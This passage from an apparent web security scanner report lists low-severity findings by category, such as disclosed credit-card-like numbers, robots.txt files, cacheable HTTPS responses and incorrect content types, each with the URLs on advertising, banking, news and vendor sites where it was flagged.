23.170. http://www.facebook.com/plugins/like.php
23.171. http://www.facebook.com/plugins/likebox.php
23.172. http://www.facebook.com/plugins/likebox.php
23.173. http://www.facebook.com/plugins/likebox.php
23.174. http://www.facebook.com/plugins/likebox.php
23.175. http://www.google.com/sdch/StnTz5pY.dct
23.176. http://www.myyearbook.com/advertising/default.php
23.177. http://www.myyearbook.com/advertising/default.php
23.178. http://www.myyearbook.com/advertising/default.php
23.179. http://www.myyearbook.com/favicon.ico
23.180. http://www.myyearbook.com/favicon.ico
23.181. http://www.myyearbook.com/favicon.ico
23.182. http://www.myyearbook.com/favicon.ico
23.183. http://www.myyearbook.com/favicon.ico
24. Credit card numbers disclosed
24.1. http://greatponds.squarespace.com/universal/scripts/squarespace-gallery-slideshow.js
24.2. http://rad.msn.com/ADSAdClient31.dll
24.3. http://www.bing.com/search
24.4. http://www.greatpondsma.org/universal/scripts/squarespace-gallery-slideshow.js
25. Robots.txt file
25.1. http://204.124.80.52/dcs5w0txb10000wocrvqy1nqm_6n1p/dcs.gif
25.2. http://ad.doubleclick.net/activity
25.3. http://altfarm.mediaplex.com/ad/js/16024-128483-16880-2
25.4. http://analytics.spongecell.com/placements/47958921
25.5. http://api.facebook.com/restserver.php
25.6. http://cheetah.vizu.com/f.gif
25.7. http://clk.atdmt.com/goiframe/223672189/334126009/direct
25.8. https://code.google.com/p/domsnitch/downloads/list
25.9. http://community.spiceworks.com/r/595
25.10. http://dinclinx.com/
25.11. http://feeds.bbci.co.uk/news/rss.xml
25.12. http://fls.doubleclick.net/activityi
25.13. http://forums-test.vostu.com/clientscript/ncode_imageresizer.js
25.14. http://go.microsoft.com/fwlink/
25.15. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1071724218/
25.16. http://haymarketbusinesspublications.122.2o7.net/b/ss/haymarketscmagazineus,haymarketusglobal/1/H.21/s25559028366202
25.17. http://i.microsoft.com/en-us/homepage/bimapping.js
25.18. http://i3.microsoft.com/library/svy/broker-config_s1.js
25.19. http://images.apple.com/support/expresslane/data/properties.json
25.20. http://img.mediaplex.com/content/0/16024/128483/lifescript-470x250.js
25.21. http://jlinks.industrybrains.com/jsct
25.22. http://l.addthiscdn.com/live/t00/152lo.gif
25.23. http://metrics.apple.com/b/ss/appleglobal,applehome/1/H.22.1/s45228154349606
25.24. http://mm.chitika.net/minimall
25.25. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml
25.26. http://pagead2.googlesyndication.com/pagead/imgad
25.27. http://paid.outbrain.com/favicon.ico
25.28. http://pixel.everesttech.net/2368/gr
25.29. http://pixel1350.everesttech.net/1350/p
25.30. http://pshared.5min.com/Scripts/ThumbSeed2.Style.js
25.31. http://pubads.g.doubleclick.net/gampad/ads
25.32. http://puma.vizu.com/cdn/00/00/22/09/smart_tag.js
25.33. http://rad.msn.com/ADSAdClient31.dll
25.34. http://s7.addthis.com/static/r07/sh46.html
25.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYlrYDIJq2AyoFF9sAAA8yBRbbAAAB
25.36. http://static.ak.fbcdn.net/connect/xd_proxy.php
25.37. http://tag.admeld.com/ad/js/785/lifescript/728x90/ros
25.38. http://web2.checkm8.com/adam/detect
25.39. http://www.apple.com/
25.40. http://www.betabeat.com/2011/07/19/fever-pitch-new-yorkers-go-starry-eyed-for-start-ups/
25.41. http://www.datacard.com/
25.42. http://www.facebook.com/plugins/likebox.php
25.43. http://www.google-analytics.com/__utm.gif
25.44. http://www.googleadservices.com/pagead/conversion/1071724218/
25.45. http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx
25.46. http://www.microsoft.com/en-us/security_essentials/default.aspx
25.47. http://www.observer.com/wp-content/themes/nyo_tech/js/global.js
25.48. http://www.paloaltonetworks.com/cam/switch/index.php
25.49. http://www.righthealth.com/external/ads/clo.gif
25.50. http://www.scmagazineus.com/
25.51. http://www.walmartlabs.com/
26. Cacheable HTTPS response
26.1. https://acn-members.apple.com/mo_login/login.lasso
26.2. https://domsnitch.googlecode.com/files/v0.707.crx
26.3. https://towernet.capitalonebank.com/loginpage.html
26.4. https://towernet.capitalonebank.com/whatis.html
27. Multiple content types specified
28. HTML does not specify charset
28.1. http://ad.doubleclick.net/adi/N1558.NetMining/B4616765.3
28.2. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225
28.3. http://ad.doubleclick.net/adi/N1558.NetMining/B4820225.2
28.4. http://ad.doubleclick.net/adi/N5327.LifeScript/B5695360.3
28.5. http://ad.doubleclick.net/adi/N5767.dsc.discoveryOX2348/B5649101.33
28.6. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.10
28.7. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.11
28.8. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.12
28.9. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.16
28.10. http://ad.doubleclick.net/adi/N5823.Discovery/B5629823.17
28.11. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_newsreel
28.12. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_story
28.13. http://ads.pointroll.com/PortalServe/
28.14. http://amch.questionmarket.com/adscgen/st.php
28.15. http://analytics.microsoft.com/Sync.html
28.16. http://analytics.msn.com/Include.html
28.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs
28.18. http://ds.addthis.com/red/psi/sites/www.seashepherd.org/p.json
28.19. http://fls.doubleclick.net/activityi
28.20. http://load.exelator.com/load/
28.21. http://mediacdn.disqus.com/1311185431/build/system/def.html
28.22. http://mediacdn.disqus.com/1311185431/build/system/facebook.html
28.23. http://mediacdn.disqus.com/1311382870/build/system/def.html
28.24. http://mediacdn.disqus.com/1311382870/build/system/reply.html
28.25. http://mediacdn.disqus.com/1311382870/build/system/upload.html
28.26. http://odb.outbrain.com/utils/ping.html
28.27. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html
28.28. http://p4.hd7x6e5x4k2yw.toliueuqmj3cr4lx.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html
28.29. http://scripts.chitika.net/static/hq/lifescript.js
28.30. https://servicing.capitalone.com/favicon.ico
28.31. http://showadsak.pubmatic.com/AdServer/AdServerServlet
28.32. http://static.addtoany.com/menu/sm3.html
28.33. http://support.klout.com/
28.34. http://support.klout.com/favicon.ico
28.35. http://switch.atdmt.com/jaction/CODB_IOC_Overview/v3/atz.FB8DCF93533EFDA4
28.36. http://switch.atdmt.com/jaction/CODB_IPOS_OpenAccount/v3/atz.FB8DCF93533EFDA4
28.37. http://switch.atdmt.com/jaction/COF_Sav_Homepage/v3/atz.FB8DCF93533EFDA4
28.38. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220
28.39. http://trk.etrigue.com/track.php
28.40. http://w55c.net/ct/cms-2-frame.html
28.41. http://web2.checkm8.com/adam/detect
28.42. http://www.boston.com/newsprojects/widgets/twitter/get_tweet_count.php
28.43. http://www.everestjs.net/static/ad_if_c.html
28.44. http://www.hitcon.org/hit2011/
28.45. http://www.hitcon.org/hit2011/download.html
28.46. http://www.lifescript.com/adcontrol.htm
28.47. http://www.lifescript.com/html/comScore.htm
28.48. http://www.nmmlaw.com/templates/nmm_2011/images/bg/spacer4.jpg
28.49. http://www.seashepherd.org/
28.50. http://www.seashepherd.org/news-and-media/2011/07/19/emergency-sos-from-captain-paul-watson-save-our-ship-1263
29. Content type incorrectly stated
29.1. http://a.rad.msn.com/ADSAdClient31.dll
29.2. http://a1.interclick.com/getInPageJS.aspx
29.3. http://a1.interclick.com/getInPageJSProcess.aspx
29.4. http://adadvisor.net/adscores/g.js
29.5. http://ads.adap.tv/beacons
29.6. http://ads.pointroll.com/PortalServe/
29.7. http://aka-cdn-ns.adtechus.com/apps/160/Ad1840288St3Sz154Sq20383166V2Id2/E-160x600.jpg
29.8. http://aka-cdn-ns.adtechus.com/apps/247/Ad1695991St3Sz170Sq20242213V6Id1/extFile1.js
29.9. http://amch.questionmarket.com/adscgen/st.php
29.10. http://articleonepartners.app7.hubspot.com/salog.js.aspx
29.11. http://attributiontrackingga.googlecode.com/svn/trunk/distilled.FirstTouch.js
29.12. http://bostonglobe.tt.omtrdc.net/m2/bostonglobe/mbox/standard
29.13. http://bs.serving-sys.com/BurstingPipe/adServer.bs
29.14. http://cache.boston.com/universal/js/sitelife/DirectProxy
29.15. http://cache.boston.com/universal/js/sitelife/SiteLifeProxy
29.16. http://cache.boston.com/universal/js/sitelife/SiteLifeScripts
29.17. http://catrg.peer39.net/443/131/66315943
29.18. http://consultants-locator.apple.com/favicon.ico
29.19. http://consultants-locator.apple.com/javascript/fancybox/jquery.fancybox-1.3.4.js
29.20. http://consultants-locator.apple.com/javascript/formatDate.js
29.21. http://consultants-locator.apple.com/javascript/jquery.js
29.22. http://consultants-locator.apple.com/javascript/jquery.tools.min.js
29.23. http://consultants-locator.apple.com/javascript/portal.1309219793.js
29.24. http://consultants-locator.apple.com/javascript/tooltips.js
29.25. http://consultants-locator.apple.com/javascript/treeview/treeview-min.js
29.26. http://consultants-locator.apple.com/javascript/wick.1295053156.js
29.27. http://consultants-locator.apple.com/javascript/yui/accordionview.js
29.28. http://consultants-locator.apple.com/javascript/yui/animation.js
29.29. http://consultants-locator.apple.com/javascript/yui/connection.1287529288.js
29.30. http://consultants-locator.apple.com/javascript/yui/container.1287529288.js
29.31. http://consultants-locator.apple.com/javascript/yui/dom.1287529288.js
29.32. http://consultants-locator.apple.com/javascript/yui/event.1287529288.js
29.33. http://consultants-locator.apple.com/javascript/yui/json.js
29.34. http://consultants-locator.apple.com/javascript/yui/utilities.js
29.35. http://consultants-locator.apple.com/javascript/yui/yahoo.1287529288.js
29.36. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png
29.37. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png
29.38. http://event.adxpose.com/event.flow
29.39. http://geek.net/favicon.ico
29.40. http://go.ionearth.com/sites/all/themes/ionearth_base/js/cufon/cufon-replace.js
29.41. http://hipservice.live.com/gethip.srf
29.42. http://i3.silverlight.net/css/main.css
29.43. http://images.apple.com/global/nav/scripts/globalnav.js
29.44. http://images.apple.com/support/expresslane/data/properties.json
29.45. http://images.lifescript.com/images/button/sign-up.gif
29.46. http://images.lifescript.com/images/menu/subnavslice.gif
29.47. http://km.support.apple.com/kb/resources/js/ACShortcuts.js
29.48. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate
29.49. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo
29.50. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur
29.51. http://mediacdn.disqus.com/1311382870/fonts/disqus-webfont.woff
29.52. http://my.seashepherd.org/NetCommunity/view.image
29.53. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html
29.54. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/banner_01.gif
29.55. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/header_timeout.jpg
29.56. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/Images/vs_img.gif
29.57. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_02.gif
29.58. https://onlinebanking.capitalone.com/CapitalOne/Themes/TopTabMenu/images/banner_bg.gif
29.59. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/0badc71136ae076478bf83f1541081ef453a111b50cb3c0205ab52e9e820b250c59e028538eac0d71309572f0532760df61ffafd404f7f7ab96572302fa3ef4c6d5dc2c8cd1dc1a174788921c98221c53d967ba94189cac14a16e1f4053786961a7d48d1416a04630911413ae7cd25bf7f10707ad647ed34403ddb452b88e8846c648cd99df5c6f20b46880f9bb57eee5eae54eae4aefb7497150ad28a191670ac26b14d9dc24ee61c3e76cb42707268f260ed7c236543cc412c64472c1072fd236cab74511ddbbbf2526e65bd23f8eb5fa31b8a3212d5a23574333902101bcfc1e80b823a81ca1bc5dc9f7524b31d8674bfbd05ab898e36ca561f24d75e9cbba0646e1f09def18788d536fbb2e4d1097f346606f1ea29773e76a171d4fdcbcc241f33e8c92412a6c8c46f8c1c23faf2b4de0005d7bb03a656aa1e6c2c45a631db0d4de5f0aecaba1d66d217e1e28add9e4f9be3bd00db3412285787c900b2df5bc89de71a29c015b68fd911a704b7560ccb4bc5c899ac25da54e5b44e39dbef3f32d87c80f2a5b2885eb1ca74be75e769d072b660081d77084661fce65bdba0001c49f8d4fb2c8984048edab2fb9da97dab40eeb8c33e0267461c359d6bca5e7885045496d872995a0ef0948fe07b78583ea69e3dca935611c534fb9cacbf76f37e62c34fcc5be9d5e88df4a72430d41eb1a65b0c1c571a8eaf0f40f98fd7410db92b53a3cac79145a5ceaa5650c6e05e22b80403da493353bed5c8b31d09ff097cea50eb716193a69fd28bb5136a45a48c3402b5feac1ebc06cf5e3e73e24c4ca10c43eafd1886f08429f35962c20edeca367e3074915d5a0ca93443f0d8359b2904e55f2c8b109e75943f04ee5d8de83ef32be508211f8ee8f11e9ffa0e93ecf8aa9f4f9937140f7aeb761302bffba078554940735654b111b47f7616a372c4fe10bbcea7983c02ccadc9c9cee987ddba0049a140
29.60. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263c0c8e390b045be24a4caad2cb5ea74b1748fc205b3f2c51e89a461f341026e5795fcce4d3188e72b0232ca46e3f76599d9c6acfd4c41d4d07573dd137afaca4320220da7d25dd280c6db34bc4f161c396ddaf9d702beafd54328f8656d10a931162f8fb320b997e456b7f579ca99c3819174bdf432231b623d87320c20879e9063c31532f2265f999025ef6544ec230901b74370747a0cfb5f3be20a7d3377877f9bc09bdd0148dc46e6f5c65b2cf0325094b6eba36eca3f9526ef9c9f00876ab065933f067123a51f6a478170716e86c83bbee58dc85a1b26d6ede86650472a8da199989f4f7ce60ef9c141e96c196e2044d7833454dbb20b9f0ad7c5f92328dc654a9934521f753f31faa7515cab99f6833a9340ce09efd927b3aa9154c3e521fcc0ee3556124839da980882ad6cefd9a92b87de7656cc4de422fd9f9bd41bbc084dadd762251153a3b4ea20ae55445a1a722f24b304079665
29.61. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297c9688e28391fc14aac6545983263dfcfe183b902c26fa198f06ba09a74dc2d9dd314b2d6c8508dea3ea30508261a98e8d5613198ac3f4f6b8900a8b429d8819b99f11c1286c93f298c572badd95c696558ae9f0c99d497d52c971f3e0f7b2083888543e6ee92552bb074324cf667406b8fde45caf3c467f0b914c19784cec701d3d05e456b7a7c87614163cebaa008bd1545932724ece727e96238e8230075b6457f76626cee344b850b051957897be8c1f6da1a57d0398488ac4b22e1520ac3f4bde8399f7a8351b3cace45d831e915c4710f2532b6611847917c6a1feab747acf995fa0b1c35acfa90764a5c73d9f9c7e9e35666936b95be268a691e613a4bd58e6465c4f449c067dc91a33b02cb7f5fc50816597a797f92a71317acc4e6c877dd64a176ecda3ca8c5f530bd8322e9d9886c1146642fd3837d98b60fb68cd74bf8bf660d8c25f653f384f1ec24d57e40d18f21654d1afde2a43ad80766763a393d378a95a0d0a114ed6dee18feed7d40ac5d0ca298b74e18fd1d1a155ec038416abf9f1eea7fb487fb6c4cd3de4974940d48f413ab82bd125c7b1672a09090b0aad5a03580d44ddca7dd662118f572e38d0a52debddfd1010b7ac77ea00b30e7d6e50bdd71d44bb0fa7c9ca97cb7c98759dfe110c8f926b84f7fe2a48e819f36ff35a52add046452e4a76c3c4b7372201bf28e1cb66933939d9eb370b4ec2371a52216521ce237a5025a929e90e89d6af40687cbc0702584030cf05d61fc1b22c03c88879220167fd372e6b1faba801a45bb5dff3979b5f9e390fdbd5ff32d9b38c418392fccbc6bbc1dd790bb34df9fe61c2c43167b4a49761cee929ad556e9e36bbefce42a567a2f0a159899683c1149d3c7e37c004f30c74e49a0c1db2fc70559da5ab0d39ef43a489a3c167fc58a6bf47ac8b8602d41daa4555422b04aad21da10153b36d4c5923938f2b980680fdb01acad38586f6ece725a00592aea2a58375258e7a0a7a0a7d056861c8a7f036048dde45accaebee81e8b590c7384fabc2406460ce1c717fad60bada7382eb45a59dad6a6688a02643faf905273500b953dcaa0fd0699e6149a42a232b96c331d8e6d4477fd288a05cadad7fe322863bf8e0c308e8e9dc5b37c7f551f385b4f81fb34dae9d43ef239f8db09a2ef033a7105c1d5bf3a55a54d02f0772cbfafc48b17ecddbff30e8eae3b6caf77a73f4c336a1ce8f591016ff28e90d7450a76eff8cc7c274d5395b3bfb37ca9eaa47d4509c0c77a3e7881a713f9cb55f87f5321ff05df064910caa8c724160e9a49c1a4b217d18c95278ab4cfa40ca940b8e60b37af23ae433288d77f95c5400e33e3045d46367e2ceadb721902cfb3e3864c75a44a2a781f6f95325d349fb1a86bbfe239f4d3341e9890f3ab4bb899564a0be17ef98767e00d3eefb6d6e2417d7ae832cfd6d6775d7d69f754c6700bd3abe3e49ec4918027f60f10dee733e46b9c3f938fb069edb7cfd750b193ef2551071a7d8ac6ff6ed1a8b1988fe45c826b90dec9cd98be5f70f6f26c5743c6b8da338df1e1a1710568ccdca3deeefd6cecbc2a1169135385aa5728f943096e4333826758a4ee7be95e4a05c6db118cd3622321809b9a68f0b572d54267545a7fb3ff1ebecc9419ad7886874a03f937bd4009938554e3e9b36a1e75600acf69685c778e2af7b9cfed919b9ffa2e2e60123cfc2105f300be6e1a9f531e925d6fe0b10bafc2321053f1cb703b4c2844fd046d64a5ea46269793d27ab574ec2c457529ae05027e30f656b8f0c83721cb335f67131a1d69ed15e43d788c71c1013089784d845dbb576169330c255e434662e219fd0ea3db8581b703d8e30b4d2b9e518223100f6c0c3ecfeac24f759bf6c55ced5d7422eb5d028332/1311280499290-658/0/5
29.62. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2c5e2033352659b4256b88303a637cca8448ceb87a0ded8d123b613ac0c1963e359c05e0230e29156736c2a6895f3c1cffa64b9fac27801e8a9146b54a1ff52d056f7f32e3f3a71fef59a588e7f0624829dbaa6efa3b690eabde83297ca658e2d7e638f51a17253e62a7fffd4a2ddfe438d2ee59bea3af3a232c03dcc8157ea978d4cd6a469e343127057d7bfe8763abcf03c435b8b06a8ab33d387cfc8fe0b1591c96939835066ea984c697621aad753d89197c375e55d7965726d83b4895ae6fbc44d3386156e14a93305329fdc44d2e88220a0f96083aab5f2f573aa961511747130962c1f3596fdf71bb3193ae42434eee026e16838eb260177ad43797c740f8d5f3bef244e4d02877beec0eed21a54c73a858cb80a65ef4e0ac6f5b6e6389a728d52a5c1c554b951816fa4195e6332a868184bc6247e5ca0bb4da1acc1a40d522becaec2310e0c31999095a2a80828b056ab9c03e37463095c35d982474fadb20dcf11d5c0fd54438b6915985c221f253a4488812457fceea0e2208a37d705e8cb48a191a70496b47eb898e21b5713476f89d52ae4e03ae787d03e92ce12118b51f521e58ee99b45a4004facc00f7e411bfdf7bf72ef5b4f763d240430bd9da0f1fd50bf7fec1ffeed7c5eaf4d0cab82b74618fc19066d078507477aa29619ab55a1dad95356c9c36e44940b598d42e8c8b21344661472be8292b1a1c6a63f8fd75fabfb8e320302f966f8d0335dd9fae8ed1a0161d673a5426de980e140d9249f54b9ae7cddb678eb99834e88b401e3bd7cfd176abcf2c898ea3da938ea02fd032b05a4ae392c5343796647f9f619a63b3396cbd5b773e5a7682ef4735d054ab666be000592def0e7987efd138ecbd238178d0e4fd37d66b31237c93c9acfba33567bd066cffacab595151cae06ab6d729ef6e684f4a856f33fd31dcd511f2fca886dbd01c5b2fc09c386b9487841194e51556c07fbdb86ae14c1e47ca5e7ee115f65642747b6b33c64716dc8d7e5451a533fc75d35efefc023c6054cc175a0c0e7a76e16c3635633a4c832a122c4d4192148c8d21c7a13ee048512e77a6565319e98d9636de391d16707df56a8b9370d633ed0210e525b30e42258305d1a8cabd7cea8b82ca719883d77044ddae70e9cacaa8610de56150bd88aff5e5a631087b66082a379d8845a2eb64850a681927bf27c1850d0e311101405c606b0e0be4aeeb02a9d2aa453ae541b35866838078f5df377b3aca4af56301ed2e10741fe989086bb3d274d08755140b5bd219de0c366fa66a9f07efbe5105c146bb7b4df5032c3400792317aeda2f5d852e2d9ddad09d5ac4410d252c74728191d70d983a66906ea948cd65c1360f890bc25794b5985b4b7a226d0b4f62c1e51b2830a4102e0d87180e933865c39138267a5723569ac83b02c6a4a9b5fcfe1e94791c4b72bdcba808c2cae0fe1ac5761ea3b89037a8f9a77ce86305874b0140f432c7d30a78d231e07d9b5b5dd1c78fb595737317499335d2184f99f3796e23ee9ea33299090d2f70fea8b544c0be17fe78477e30c24eeb2d6e4456102b177f0d0c66a547a28dd419b4a28d7baefe295c3b38c69af4c4cd1e73a853ede7ddad2ee10b1ec9e8b05b997e27b145e5026d58be917968797cece9202e640a6f5f98be6cc4816a3c75a781a9ab88e7cabcbb4b20b0431998faadaeea764b9bb5c333b110b84a9260b83615f4e356380332e85906ff73f154ae8fd4cd48e731211ac899073fbf164904c2e1a1c69fde040b1978015bd2281c40050f262b00945da9f44b9f7b3671f525b37940c2f47709f34b9ff81f695c3e2e2373d7d0f3bbd2602ad1bf32f17af6f7fc51462fba01caa8a744b5dd9d92d25402542fb166e71fea0402f9bc9db60b660ec734e2f28b7160f6f0fc54aa4f6d96406ca3341711a2f5121a84db37b64c831f45c21e6295c9352ae51363f044f731959463ef64cb154b9c99cdbff0edce5185c24944dd96351282c1234d3e2c6542286d09804f44e7475ec4a15d026/1311280711520-955/0/4
29.63. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283cf7721a3766fd0efddefab44c148a54c3d5dd2127eb3c0ebbfdd1f23b8e7a8b5caab8cb41d9289813c6784e6739b2620434950c6a04e7b34edffeeabf4d6435a7f283685e2810a98bd2ebf92875f20e89c243eb631a192345d6f03832d1c502bb17a0c3fc2041f96719e528410731647ebd8e0903a1ded0d379c664ff2483b557dcdae854a6b178adb3a32851295539da987585b60da096c27ae292501c8343f523f588e29747a50f49a9d67b3a700ce2e1b160b95921401a0f1c0f9cab86e0be1ef872fe04f3b23e03f80e58fbd0e61e00f50f196f7586781c6fb58b19ad5cbbd1bd080093f61802c74d03ff06ae9faa11306c1471e2c4c3f4f5c3a63d90d72ab4f9fc317c59f475fac679099ff198c350583afa7e8d3a70e8d4f716ac65c94bf5b92199a97ea8c9f21684b553e3f92baf4429bf81df9dee2df933a93ce001341af2f36d7d4e56273e12af8948a26965c79e80e130b4ce2b7ad130425140b173e70f0d82d1a9e49a3da947cd9ef56f42db505fab2d31f14a77956acbd3b763092bc067e5eef5b8c34e5af808d87a66e1aeb6c6a3ed0cac7fcd69910d44739cfe3cff4684dda24d9dc0b24c6935551f111f2d2bb89d9a9115caee67befaf360023c247a3bc6d7331a721293c7e2581f5920c0564ab4a9810d905f68c052a098b1f931438a705742b4d244b338d7ac52750eaf9d5d4335fd03e015cb4a2d203bcfc4867472a4bdb7055e9e44f2e57c5e7861c10c05513d74b7694e2f4b15d997f5f484a725e0138829586a488ab11d81b9db8278a4291770c7f3fb3b45704ae8d213f3d208a9f52650c72427c8d7f27f8d141958b29558715506805b8ba1f616e8e9698a38ad5ef7164173fd1c34079c5df57cbeaeacab5a2102c5e15a02bba2b9d9d53f26453f770e2cadae2fd9e0c464a664d4d708b2e9043d7719cda0be374dae3e049d685ab8fbd885639daaa6a07edbb5487ff662f166596c7968a8ead75522cbb386dd31620b8c9ec17a2a0802c7e8e4e63ba784ae764057a4d25447588c8b70d0bd5e9e0c35118f72a877636bb8d8a0357914a64dc0a2b0539f80e77bd4ec9ef67cf949bbec0a33bb27fc0771cbdd5a90ca581b5781767122516d3baa8e31031494e4ccc5156e9504123d5c2fc261782787bfd929ebb26daf8f606acfdea6ae5bc8fb305908f10fea8c659b1b4dfeaece9a220464d315ef9b9f3a5f6630d559da6539f5a8fed9b4f691846ea31a13ce8148891dfd4d9187a23abaa1d9c02dde9dd40970272f46bff78273ed8a9dbeb2e4719d47c18d9ff3ccec0b4ce0ee794a02eb94da378ffdcdeb1a4d77b6b9d3aef5fe7696e70b27355305dbec3b2ec9625d59696dd9137f95cd6ff73f3c76bbaa1b93d5657373d49e9d30a0b575d3426702087fe8af18e895cb4ef97f86841c01ac6bbd11568a0123cabc
29.64. http://ots.optimize.webtrends.com/ots/ots/js-3.1/311121/1027ed543b58578e6e3b824071758d9bdeafd1265a7b24402f7551e927c3acb81cdbfa67bfd3446b42706edbe6b0608936758c58f0c7d1f68b5cd4c42f5e53570bdeeee23870722b7d8b04c597f794d7783788d7dcd698ad7762aafea74aa37fa510cf7fb65c91e76191dbdbfc018d381dcdbf4f180bd9e2e9dbca7cc5c43a11e023d7a7981e3897c9fb0faa723125b37b97068f26a4eab5c4c3548a0c623005a73d5504a9bf9de72f4cd03f9bbbe1e8461e15f54b45d987124df70c44f3c0b4b41a57f9fadff3b4403ba6b53da11aad8870297000d1d58bee13bc8ca059fde624ee792c4eff2ba07f6f45d7b1ce090cefe2d23d748dcadb7f4e9486e790e2ceea0b244f73924150e4851eaf77c4af078ceac7bc95cfcd21f514bd03137fe24bd3210025f9ba446a7c715395e6bfcffb5aa0a8c52932e9aa046641bbef04c138c7e7220c0b48faf3be5b9a2a3035c1d5f4fc8aecf6c5e7bdfe70d4dd4d812839219001e57855c84e2eb1caf499b852de7fe58dea01e0ab09b67883d529bdc0cf0b98a461fc43117445cbad883473cee03f416c8d32ada22884c996d0b0221495dc6d7ee90829a38d4c2e2c4c9bd857c986ddad77b70879652b7fc2f7c45feee8af1975ae2e7c13ba32162f8f8c109497db37afed36d79585df8311cbd650572a2f68ce6b4b7f87e9be08ca7438f22d3bece727e96334e1260e70b0417d6f6e19f7283c